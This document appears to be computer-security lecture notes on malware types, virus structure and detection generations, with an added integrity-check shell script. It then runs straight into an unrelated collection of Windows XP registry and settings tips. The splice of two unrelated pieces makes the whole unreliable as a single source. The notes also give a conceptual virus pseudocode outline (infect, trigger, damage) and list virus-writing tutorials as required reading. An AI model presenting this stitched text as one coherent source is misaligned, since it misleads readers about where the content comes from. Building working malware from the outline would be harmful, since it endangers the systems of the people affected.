* Viruses are "programs" that modify other programs on a computer, inserting copies of themselves. A program is a file that adheres to a strict description of how its content is organized. On Linux systems, the ELF document of some 50 pages describes this format. In this sense, viruses are not programs - they cannot run on their own, and need to become part of some host program. When such an infected program is executed, the virus attaches itself to another and so on.
* A worm is a malicious program that copies itself from one computer to another on a network. A worm is an independent program, in the sense described above, unlike a virus which is a part-program that must insert itself into a whole-program. A worm typically does not modify other programs. A typical worm may carry other code, including programs and viruses.
* Trojan horses are programs that appear to have one function but actually perform another function. Trojan horses are named after the Trojan horse of the Greek Trojan War.
* Bacteria, or rabbit programs, make copies of themselves to overwhelm a computer system's resources. Bacteria do not explicitly damage any files. Their sole purpose is to replicate themselves. A typical bacteria program may do nothing more than execute two copies of itself simultaneously on multiprogramming systems, or perhaps create two new files, each of which is a copy of the original source file of the bacteria program. Both of those programs then may copy themselves twice, and so on. Bacteria reproduce exponentially, eventually taking up all the processor capacity, memory, or disk space, denying the user access to those resources.
* A dropper is a program that is not a virus, nor is it infected with a virus, but when run it installs a virus into memory, on to the disk, or into a file. Droppers have been written sometimes as a convenient carrier for a virus, and sometimes as an act of sabotage. Some anti-virus programs try to detect droppers.
* [From http://securityresponse.symantec.com/avcenter/refa.html ] "Blended threats combine the characteristics of viruses, worms, Trojan Horses, and malicious code with server and Internet vulnerabilities to initiate, transmit, and spread an attack. By using multiple methods and techniques, blended threats can rapidly spread and cause widespread damage. Characteristics of blended threats include:

* Causes harm: Launches a Denial of Service (DoS) attack at a target IP address, defaces Web servers, or plants Trojan Horse programs for later execution.
* Propagates by multiple methods: Scans for vulnerabilities to compromise a system, such as embedding code in HTML files on a server, infecting visitors to a compromised Web site, or sending unauthorized email from compromised servers with a worm attachment.
* Attacks from multiple points: Injects malicious code into the .exe files on a system, raises the privilege level of the guest account, creates world read and writeable network shares, makes numerous registry changes, and adds script code into HTML files.
* Spreads without human intervention: Continuously scans the Internet for vulnerable servers to attack.
* Exploits vulnerabilities: Takes advantage of known vulnerabilities, such as buffer overflows, HTTP input validation vulnerabilities, and known default passwords to gain unauthorized administrative access.

Effective protection from blended threats requires a comprehensive security solution that contains multiple layers of defense and response mechanisms."

Virus Varieties
Stealth Virus

A stealth virus has code in it that seeks to conceal itself from discovery or defends itself against attempts to analyze or remove it. The stealth virus adds itself to a file or boot sector but, when you examine it, the file or boot sector appears normal and unchanged. The stealth virus performs this trickery by staying in memory after it is executed. From there, it monitors and intercepts your system calls. When the system seeks to open an infected file, the stealth virus displays the uninfected version, thus hiding itself.

Macro Viruses

Macro languages are (often) equal in power to ordinary programming languages such as C. A program written in a macro language is interpreted by the application. Macro languages are conceptually no different from so-called scripting languages. Gnu Emacs uses Lisp, and most Microsoft applications use Visual Basic Script, as macro languages. The typical use of a macro in applications, such as MS Word, is to extend the features of the application. Some of these macros, known as auto-execute macros, are executed in response to some event, such as opening a file, closing a file, starting an application, and even pressing a certain key. A macro virus is a piece of self-replicating code inserted into an auto-execute macro. Once a macro is running, it copies itself to other documents, deletes files, etc. Another type of hazardous macro is one named for an existing command of the application. For example, if a macro named FileSave exists in the "normal.dot" template of MS Word, that macro is executed whenever you choose the Save command on the File menu. Unfortunately, there is often no way to disable such features.

In May 2000, an Outlook mail program macro virus called LOVELETTER propagated widely.

Unix/Linux Viruses

The most famous of the security incidents in the last decade was the Internet Worm incident which began from a Unix system. But Unix systems were considered virus-immune -- not so. Several Linux viruses have been discovered. The Staog virus first appeared in 1996 and was written in assembly language by the VLAD virus writing group, the same group responsible for creating the first Windows 95 virus called Boza.

Like the Boza virus, the Staog virus is a proof-of-concept virus to demonstrate the potential of Linux virus writing without actually causing any real damage. Still, with the Staog assembly language source code floating around the Internet, other virus writers are likely to study and modify the code to create new strains of Linux viruses in the future.

The second known Linux virus is called the Bliss virus. Unlike the Staog virus, the Bliss virus can not only spread in the wild, but also possesses a potentially dangerous payload that could wipe out data.

While neither virus is a serious threat to Linux systems, Linux and other Unix systems will not remain virus-free. Fortunately, Linux virus writing is more difficult than macro virus writing for Windows, so the greatest virus threat still remains with Windows. [July 2000, http://www.boardwatch.com/mag/2000/jul/bwm142pg2.html ]

Spreading Malware via the Internet

Whereas a Trojan horse is delivered pre-built, a virus infects. In the past, such malicious programs arrived via tapes and disks, and the spread of a virus around the world took many months. Antivirus companies had time to identify a new viral strain, and create cleaning procedures. Today, Trojan horses, and viruses are network deliverable as E-mail, Java applets, ActiveX controls, JavaScripted pages, CGI-BIN scripts, or as self-extracting packages.

Integrated mail systems such as Microsoft Outlook make it very simple to send not only a quick note edited within a limited text editor but also previously composed computer documents of arbitrary complexity to anyone, and to work with objects that you receive via standards such as MIME. They also support application programming interfaces (such as MAPI) that allow programs to send and process mail automatically. Well over 500 million E-mail messages were being delivered daily in July 2000.

Mobile-program systems are becoming more and more widespread. The most widely-hyped examples today are Java and ActiveX. This technology became popular with Web servers and browsers, but it is now integrated into mail systems (e.g., Java into Lotus Notes, and ActiveX into Outlook). Both Java and ActiveX have been found to have security bugs.

Structure of Viruses

Here is a simple structure of a virus. In the infected binary, at a known byte location in the file, a virus inserts a signature byte used to determine if a potential carrier program has been previously infected.

Code:
V() {
    infectExecutable();
    if (triggered()) {
        doDamage();
    }
    jump to main of infected program;
}

void infectExecutable() {
    file = choose an uninfected executable file;
    prepend V to file;
}

void doDamage() { ... }

int triggered() { return (some test ? 1 : 0); }


The above virus makes the infected file longer than it was, making it easy to spot. There are many techniques to leave the file length and even a checksum unchanged and yet infect. For example, many executable files often contain long sequences of zero bytes, which can be replaced by the virus and re-generated. It is also possible to compress the original executable code like the typical Zip programs do, and uncompress before execution and pad with bytes so that the checksum comes out to be what it was.

Virus Detection

Known viruses are by far the most common security problem on modern computer systems. Several web sites maintain complete lists of known viruses. There are thousands. Visit, e.g., http://www.cai.com/virusinfo/encyclopedia/. In the month of July 2000, there were 200+ "PC Viruses in the Wild" (www.wildlist.org). Virus detection programs analyze a suspect program for the presence of known viruses.

Fred Cohen has proven mathematically that perfect detection of unknown viruses is impossible: no program can look at other programs and say either "a virus is present" or "no virus is present", and always be correct. But, in the real world, most new viruses are sufficiently like old viruses that the same sort of scanning that finds known viruses also finds the new ones. And there are a large number of heuristic tricks that anti-virus programs use to detect new viruses, based either on how they look, or what they do. These heuristics are only sometimes successful, but since brand-new viruses are comparatively rare, they are sufficient to the purpose.

Virus scanners are sometimes classified by their "generation." The first-generation virus scanners used a previously obtained virus signature, a bit pattern, to detect a known virus. They record and check the length of all executables. The second generation scans executables with heuristic rules, looking, e.g., for fragments of code associated with a typical virus. They also do integrity checking by calculating a checksum of a program and storing the encrypted checksum somewhere else. The third generation uses a memory-resident program to monitor the execution behavior of programs to identify a virus by the types of action that the virus takes. The fourth generation combines all previous approaches and includes access control capabilities.
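
The length check of the first generation and the checksum-based integrity check of the second can be shown side by side. The script below is an added example, not taken from the lecture notes or from any scanner they cite. It substitutes a plain SHA-256 digest for the "encrypted checksum" mentioned above, the function names are hypothetical, and the three files are constructed stand-ins for executables.

```shell
#!/bin/sh
# SHA-256 of one file; falls back to `shasum` where sha256sum is not installed.
file_digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# make_baseline DIR
# Prints "<bytes> <digest> <path>" for every regular file below DIR.
make_baseline() {
    find "$1" -type f | sort | while read -r f; do
        echo "$(wc -c < "$f" | tr -d ' ') $(file_digest "$f") $f"
    done
}

# verify_baseline FILE
# Compares the files on disk with a saved baseline. The length test is the
# first-generation check; the digest test catches changes that keep the length.
verify_baseline() {
    while read -r size digest path; do
        if [ ! -f "$path" ]; then
            echo "MISSING $path"
        elif [ "$(wc -c < "$path" | tr -d ' ')" != "$size" ]; then
            echo "LENGTH-CHANGED $path"
        elif [ "$(file_digest "$path")" != "$digest" ]; then
            echo "CONTENT-CHANGED $path"
        fi
    done < "$1"
}

# integrity_demo
# Builds three constructed files, records a baseline, then changes two of them:
# one grows (bytes prepended), one keeps its length (filler bytes overwritten).
integrity_demo() {
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        mkdir bin
        printf 'HEADER-code-0000000000-end' > bin/tool_a
        printf 'HEADER-code-0000000000-end' > bin/tool_b
        printf 'HEADER-code-end' > bin/tool_c
        make_baseline bin > baseline.txt
        printf 'EXTRA-HEADER-code-0000000000-end' > bin/tool_a
        printf 'HEADER-code-XXXXXXXXXX-end' > bin/tool_b
        verify_baseline baseline.txt
    )
    rc=$?
    rm -rf "$dir"
    return $rc
}
```

The check is only as trustworthy as the baseline, so the baseline file belongs on read-only or off-host storage where a modified program cannot rewrite it.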

It is very educational to study the details of a scanner. The paper by Sandeep Kumar and Gene Spafford, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference, IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992, is Required Reading.

Lab Experiment

None.

Acknowledgements

These lecture materials are gleaned from many sources. All are presented after careful reading. In some cases, I may have neglected proper attribution. I assure the reader it is not because I claim authorship. Indeed, in the lectures there is hardly anything new that I have contributed. Suggestions for improvement are always welcome.

References

1. Vesselin Bontchev, Future Trends in Virus Writing, 1994, IFIP TC-11, http://www.commandcom.com/virus/trends.html Recommended Reading.
2. Virus Bulletin is the technical journal on developments in the field of computer viruses and anti-virus products, http://www.virusbtn.com/VirusInformation/ Reference.
3. Simson Garfinkel, Gene Spafford, Practical Unix and Internet Security, 2nd edition (April 1996), O'Reilly & Associates; ISBN: 1565921488. http://www.oreilly.com/catalog/puis/errata/ Chapter 11. Protecting Against Programmed Threats. Required Reading.
4. Sandeep Kumar and Gene Spafford, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference; IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992. Required Reading.
5. Steve R. White, Morton Swimmer, Edward J. Pring, William C. Arnold, David M. Chess, John F. Morar, "Anatomy of a Commercial-Grade Immune System," 1999, http://www.research.ibm.com/antivirus/SciPapers/White/Anatomy/anatomy.html The site (www.research.ibm.com/antivirus/) has many other excellent articles. Recommended Reading.
6. Dark Angel, "(Phalcon/Skism) Virus Writing Tutorials," http://www.sirkussystem.com/virus.html Required Reading.
7. Matthew G. Schultz, Eleazar Eskin, Erez Zadok, Manasi Bhattacharyya, and Salvatore J. Stolfo, "MEF: Malicious Email Filter A UNIX Mail Filter that Detects Malicious Windows Executables," Proceedings of the FREENIX Track: 2001 USENIX Annual Technical Conference, June 25-30, 2001, Boston, Massachusetts, USA; http://www.usenix.org/publications/library/proceedings/usenix01/freenix01/schultz/schultz_html/index.html Reference.

Windows Tips

10 tips for Windows

1. Not sure of website address and want to try out all possible options ?


Most computer users would choose to type less if they were given the option. The problem, for many of us, is that finding that option is itself challenging enough! Anyway, I am talking to those folks who are not in the habit of typing complete domain names and want the computer/Internet to do the job. Here are some registry changes that can widen your search domain. If, in Internet Options, "Display result and go to most likely site" or "Just go to most likely site" is enabled, you can type only the domain root in the Address box and Internet Explorer attempts to locate the correct Web site by searching different domain types. For example, if you type "Microsoft" in the Address box, Internet Explorer searches the domain types in the Autoscan list until a domain name match is found (in this case, http://www.microsoft.com).

By default, Internet Explorer searches the following domain types when the Autoscan Common Root Domains option is enabled:
.com, .org, .net, .edu

To add a domain type to the Autoscan search list, add the string value "<n>" with a value of "%s.<domain>" and a string value "<n+1>" with a value of "www.%s.<domain>" (without quotation marks), where <n> is the next available number and <domain> is the domain type, under the following registry key: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Url Template

For example, if you want to add the .gov domain type and there are already 7 domain types listed, add a string value "8" with a value of "%s.gov" and a string value "9" with a value of "www.%s.gov".

NOTE: The order in which Internet Explorer searches domains is based on the string value. For example, the domain type associated with string value 1 is searched before the domain type associated with string value 2.

2. Attention LAPTOP Users ! Do your eyes a favor, use Clear Type Fonts.

Hi everyone! Maybe you have already realized the importance of Clear Type fonts by now. This new feature must be a boon to all those people who spend their lives staring at these monitor screens! After years of research, it has been noticed that Clear Type fonts are the best way to prolong your laptop computer experience. Windows XP comes equipped with it and you can change the setting to use Clear Type fonts. What is not so simple is changing the Welcome (logon) screen to use Clear Type as well. I have got hold of a tip that might help you enable Clear Type fonts on the logon screen. Save the following to a .reg file and import it into the registry.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop]
"FontSmoothing"="2"
"FontSmoothingType"=dword:00000002

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"FontSmoothing"="2"
"FontSmoothingType"=dword:00000002

For those of you who do not know how to use Clear Type fonts in a normal session, here are the instructions: Right click on any free area of the desktop and go to the Appearance tab of Display Properties. Click on Effects, check the box saying "Use the following method to smooth edges of screen fonts" and select Clear Type.

3. Fine tune Internet connection speed: Tip on changing QoS parameter.


This tweak deals with QoS parameter manipulation. There has been some confusion as to what can be achieved in real terms by changing the QoS parameter. Microsoft has finally released an article correctly describing the behavior of the QoS parameter.

I am providing a link to the Microsoft Knowledge Base article. In brief, though, this tweak only works on QoS-aware programs; the rest of the programs simply ignore it. Networking Quality of Service (QoS) refers to a variety of techniques that prioritize one type of traffic or program when these operate across a network connection rather than relying solely on "best effort" connectivity. Please see the article on how to change the QoS parameter using the Group Policy Editor (GPEDIT.MSC). By default, programs can reserve up to an aggregate bandwidth of 20 percent of the underlying link speed on each interface on an end computer.

If the program that reserved the bandwidth is not sending enough data to utilize it completely, the unused portion of the reserved bandwidth is available for other data flows on the same host. This default parameter can be changed.

4. Further fine tune Internet access speed: Tip on improving DNS resolution.

Internet browsing is such an exciting and easy experience nowadays that we have almost forgotten the amount of work that goes on behind the scenes to make it all happen. We only feel bad if we can't find something easily or have to wait for a long time (not too long ago I heard many people saying WWW stands for World Wide Wait!). With changes in technology and falling prices we have far better hardware and software to do this job, but the fruits of fine tuning have always been great and will continue to be so. One of the things that must happen before an Internet connection goes through is DNS resolution. DNS stands for Domain Name Service. Even though XP does a fine job of handling DNS resolution, you may still gain by increasing the DNS cache size. To do this you have to add the following entries to the registry. Save what is written below in, say, a "dnstuning.reg" file and import it into the registry by opening the registry editor and choosing the IMPORT option from the top menu.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

5. Want to remove shared documents folder from My Computer window ?

Microsoft has done a fabulous job in the making of Windows XP. But, to say the least, no two people are alike. Some of the default features that Microsoft thought were good may not be liked by you at all. I have read various newsgroups and chats, and one thing I noticed is that some people don't like the shared documents folder option. If you are one of them, here is a trick to remove it. Open the registry editor by going to START-RUN and entering regedit. Once in the registry, navigate to the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders. You should see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the shared documents folder.

6. Want to have more options in the Add/Remove program list ?

Not all programs that are available on your Windows XP system are available for removal. Take WordPad, for example. I don't mean that you want to remove WordPad through the Add/Remove program list; it just serves as an example. So why are some programs in the list and some not? It's not a game of random numbers. There are a few methods through which we can control what appears on the list and what does not. If you have installed Windows on the C: drive, go to C:\WINDOWS\inf (substituting the correct drive letter for your installation of Windows) and open the sysoc.inf file. Look at the components that have the word HIDE as the second-to-last item on the row. This HIDE tells the system not to display those items/apps in the Add/Remove program list. If you want to have such an item in the list, simply replace HIDE with a blank. I think you understand what I am saying. The file contents look like this:

[Version]
Signature = "$Windows NT$"
DriverVer=07/01/2001,5.1.2600.0
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
Games=ocgen.dll,OcEntry,games.inf,,7
AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7
[Global]
WindowTitle=%WindowTitle%
WindowTitle.StandAlone="*"

7. How to verify XP software you bought is OEM/UPGRADE/RETAIL?


I am sure we have all noticed Microsoft's product marketing strategy. Whenever they launch a new product line, there are various flavors of it available right from day one. Some are given adjectives like UPGRADE version or FULL, others RETAIL vs. OEM, and then of course we have various categories of the product like HOME, PRO, SERVER, ADVANCED SERVER, etc. Ever wondered whether what you bought is the same as what was advertised? How do you tell the difference? Here comes the help. Look for a file called Setupp.ini that is present on your Windows XP CD, double click on it and browse its content. There is a field called PID=. This PID is what tells us exactly what we have got. The first 5 bytes of the PID decide whether it is OEM, RETAIL or an UPGRADE, and the last three digits determine what kind of CD KEY it will accept. Here are some of the typical PID values:
Retail = 51882 335
Volume License = 51883 270
OEM = 82503 OEM

8. Group Policy Editor: Extremely powerful tool in Microsoft XP Operating System.

Have you heard of the Group Policy Editor? This is one of the most powerful tools that Microsoft XP comes bundled with, and most of us don't even know about it. I recently discovered it by accident. Learn more about it in the Group Policy Editor section of this site, but in brief it can be used to carry out powerful customizations and performance tuning of your system. Go to START-RUN and enter gpedit.msc

9. Have tendency to forget passwords ? Want a solution that will help you get back in business ?

Most of us have a common tendency to forget passwords. If you don't ever forget anything, I envy you and this may not be of much use to you, but for most of us this may be a life saver. If you're running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk by following the instructions below:
Go to START-CONTROL PANEL-USER ACCOUNTS. Then click your account name and, under RELATED TASKS, click PREVENT A FORGOTTEN PASSWORD. A wizard will come up; follow its instructions and you have your password reset disk ready.
IMPORTANT NOTE: As with anything related to passwords, make sure that you keep this disk in a secure location, or else you risk someone trespassing on your user account.

10. Want to change font size of Internet Explorer content on the fly ?

Do you know that the font size of many web sites can be changed for your viewing pleasure? Yes, you know about it but do not want to take those additional steps. I hear you!
Here is a tip. If you have a mouse with a scroll wheel, then changing the font size is as easy as pressing the CTRL key and rotating the wheel either towards you (to increase) or away from you (to decrease).
Try it out. It works for me.